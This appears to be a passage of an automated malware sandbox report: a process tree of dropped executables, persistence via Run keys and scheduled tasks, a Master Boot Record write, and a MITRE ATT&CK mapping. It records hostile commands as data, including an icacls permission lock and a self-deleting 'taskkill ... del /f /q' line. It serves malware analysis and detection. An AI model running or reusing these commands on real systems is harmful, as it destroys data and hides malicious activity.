- Modifies registry class
PID:3156

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D0A512C4760EDC850E5FA4B6A88117D7 C
2⤵
PID:1940

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D4D915346E964EAA4ADF1CAD058CA7DC
2⤵
- Blocklisted process makes network request
PID:2188

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:3600

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C9466F1DDB24ED56BA8622D02795DDDE M Global\MSI0000
2⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\6279.exe
C:\Users\Admin\AppData\Local\Temp\6279.exe
1⤵
- Executes dropped EXE
PID:3968

C:\Windows\system32\taskeng.exe
taskeng.exe {7204D180-601F-4020-A627-ABC09B46883A} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:3872

C:\Users\Admin\AppData\Roaming\athjitf
C:\Users\Admin\AppData\Roaming\athjitf
2⤵
- Executes dropped EXE
PID:3988

C:\Users\Admin\AppData\Local\Temp\B6B2.exe
C:\Users\Admin\AppData\Local\Temp\B6B2.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3600

C:\Users\Admin\AppData\Local\Temp\B6B2.exe
C:\Users\Admin\AppData\Local\Temp\B6B2.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2240

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\1d6eede1-5293-4349-a43e-2da724a3f71a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:2532

C:\Users\Admin\AppData\Local\Temp\B6B2.exe
"C:\Users\Admin\AppData\Local\Temp\B6B2.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1528

C:\Users\Admin\AppData\Local\Temp\B6B2.exe
"C:\Users\Admin\AppData\Local\Temp\B6B2.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
PID:3540

C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe
"C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe"
5⤵
- Suspicious use of SetThreadContext
PID:632

C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe
"C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe"
6⤵
PID:2968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 892
7⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:3564

C:\Users\Admin\AppData\Local\Temp\ED6C.exe
C:\Users\Admin\AppData\Local\Temp\ED6C.exe
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:2412

C:\Users\Admin\AppData\Local\Temp\5DCB.exe
C:\Users\Admin\AppData\Local\Temp\5DCB.exe
1⤵
- Executes dropped EXE
PID:2024

C:\Users\Admin\AppData\Local\Temp\B4B2.exe
C:\Users\Admin\AppData\Local\Temp\B4B2.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im B4B2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B4B2.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:3248

C:\Windows\SysWOW64\taskkill.exe
taskkill /im B4B2.exe /f
3⤵
- Kills process with taskkill
PID:3552

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:864

C:\Windows\system32\taskeng.exe
taskeng.exe {BD51D8A5-75B8-42CF-8FD3-6E087DC6B1D9} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3976

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
2⤵
PID:3460

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
2⤵
PID:3860

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
2⤵
PID:3980

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
2⤵
PID:1152

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
2⤵
PID:3896

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
2⤵
PID:3660

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2304

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:3224

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Modify Registry

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery